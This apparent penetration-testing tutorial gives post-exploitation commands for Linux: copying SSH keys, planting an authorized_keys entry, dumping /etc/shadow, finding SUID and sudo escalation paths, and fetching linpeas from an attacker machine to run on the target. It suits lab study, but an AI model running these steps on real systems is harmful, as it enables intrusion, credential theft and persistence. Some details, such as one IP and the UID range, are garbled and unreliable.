Basic enumeration vectors after getting a reverse shell on the Linux machine
Problem:
After getting reverse shell access on the target machine you can get lost in deciding where to move further in order to escalate your privileges. You have to enumerate the machine thoroughly and enumeration is an important step in this process. You need to have established methodology in finding clues to help you in capturing the target machine.
Basic enumeration methodology:
- After getting the reverse shell first thing you need to stabilize it. See here.
- Enumerate the most important files on Linux OS and try to identify possible security flaws
- Check the most sensitive files under
/etc
directory - If necessary use automated enumeration scripts like
Linpeas
andLinEnum
Check .ssh
directory for SSH keys:
- Check
.ssh
directory if it has SSH keys stored inside and you have write permission for directory:cd ~/.ssh ls -al
- If it has secret keys copy them to your attacking machine and use them:
chmod 600 [secret_key] chmod 600 id_rsa ssh -i [secret_key] [username]@[target_machine_ip] ssh -i id_rsa user@10.10.20.53
- In case there are no keys on the target machine, you can generate your keys on your machine and then transfer them to the target:
cd ~/.ssh ssh-keygen
- Copy the content of your public key and transfer it to the inside of
authorized_keys
file in~/.ssh
folder on the target machine:# On target machine cd ~/.ssh # If authorized_keys file is note present, create it touch authorized_keys vim authorized_keys # Paste your public key, close and save the file
System enumeration
- Check all info about the system and user:
id uname -a
- Check
~/.bash_history
file which keeps track of user command history:cat ~/.bash_history
- Check
.bash_profile
and.bashrc
files for containing unusual shell commands for files and binaries:cat ~/.bash_profile cat ~/.bashrc
- Check
sudo
command version as some versions may be vulnerable to privilege escalation:sudo -V
- Check if user can run any commands on the system with
sudo
:
If yes, find exploits at GTFObins and use them to escalate.sudo -l
Check files under /etc
directory:
- Check
/etc/passwd
file, which stores information required for user login process:cat /etc/passwd user:x:1003:1003:,,,:/home/user:/bin/bash # x - character indicates that an encrypted account password is stored in /etc/shadow file and cannot be displayed in the plain text # 1003 - User ID (UID): Each non-root user has his own UID (1-99). UID 0 is reserved for root. # 1003 - Group ID (GID) # ,,, - User ID Info comment field # /home/user - user's home directory # /bin/bash - path of a command or shell that is used by the user
- If you have write access on
/etc/passwd
file you can escalate by creating a custom entry withroot
privileges. More info here. - Check
/etc/shadow
file which stores password hashes for user accounts.cat /etc/shadow user:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAMWf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:18483:0:99999:8::: # user - Username # $6$1FiLdnFwT... - Password hash # $1$ - MD5 hash # 18483 - Unix epoch time indication when last password change was # 0 - Minimum number of days for password change # 99999 - Maximum number of days the password is valid # 8 - The number of days before the user will be warned about changing the password
- Check
/etc/hosts
file for any unusual network entries
Use find
command to search for vulnerable files
- Look for
.log
,.conf
and backup.bak
files:
Most common file extensions are:# Use find for searching log files on the system find -type [file_type] -name [file_name] 2>/dev/null find -type f -name *.log 2>/dev/null
.a : a static library ; .au : an audio file ; .bin : a) a binary image of a CD (usually a .cue file is also included); b) represents that the file is binary and is meant to be executed ; .bz2 : A file compressed using bzip2 ; .c : A C source file ; .conf : A configuration file. System-wide config files reside in /etc while any user-specific configuration will be somewhere in the user’s home directory ; .cpp : A C++ source file ; .deb : a Debian Package; .diff : A file containing instructions to apply a patch from a base version to another version of a single file or a project (such as the linux kernel); .dsc: a Debian Source information file ; .ebuild : Bash script used to install programs through the portage system. Especially prevalent on Gentoo systems; .el : Emacs Lisp code file; .elc : Compiled Emacs Lisp code file; .gif : a graphical or image file; .h :a C or C++ program language header file; .html/.htm : an HTML file; .iso : A image (copy) of a CD-ROM or DVD in the ISO-9660 filesystem format; .jpg : a graphical or image file, such as a photo or artwork; .ko : The kernel module extension for the 2.6.x series kernel; .la : A file created by libtool to aide in using the library; .lo : The intermediate file of a library that is being compiled; .lock : A lock file that prevents the use of another file; .log : a system or program’s log file; .m4 : M4 macro code file; .o : 1) The intermediate file of a program that is being compiled ; 2) The kernel module extension for a 2.4 series kernel ; 3)a program object file; .pdf : an electronic image of a document; .php : a PHP script; .pid : Some programs write their process ID into a file with this extention; .pl : a Perl script; .png : a graphical or image file; .ps : a PostScript file; formatted for printing; .py : a Python script; .rpm : an rpm package. See Distributions of Linux for a list of distributions that use rpms as a part of their package management system; .s : An assembly source code file; .sh : a shell script; .so : a Shared Object, which is a shared library. This is the equivalent form of a Windows DLL file; .src : A source code file. Written in plain text, a source file must be compiled to be used; .sfs : Squashfs filesystem used in the SFS Technology; .tar.bz2 , tbz2, tar.gz : a compressed file per File Compression; .tcl : a TCL script; .tgz : a compressed file per File Compression. his may also denote a Slackware binary or source package; .txt : a plain ASCII text file; .xbm : an XWindows Bitmap image; .xpm : an image file; .xcf.gz, xcf : A GIMP image (native image format of the GIMP); .xwd : a screenshot or image of a window taken with xwd; .zip :extension for files in ZIP format, a popular file compression format; .wav : an audio file.
- Search for files with SUID bit set:
SUID - is a type of permission that allows users to execute a file with the permissions of another user.
If files are found, exploit them with GTFObins.find / -perm -u=s -type f 2>/dev/null # -u=s searches for files with SUID bit set.
Check for unusual network connections on the host:
The netstat command generates displays that show network status and protocol statistics.
netstat -tulpn
Use automated scripts for enumeration:
- Transfer
linpeas.sh
script to the target machine and execute it:# ON YOUR MACHINE cd wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh # START WEB SERVER, DEFAULT PORT 8000 python3 -m http.server # ON THE TARGET MACHINE wget [your_machine_ip]:8000/linpeas.sh wget 10.1020.53:8000/linpeas.sh chmod +x linepeas.sh ./linpeas.sh
- Use more lightweight
LinEnum.sh
script. Transfer it to the target the same way as forlinpeas.sh
More info can be found herewget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh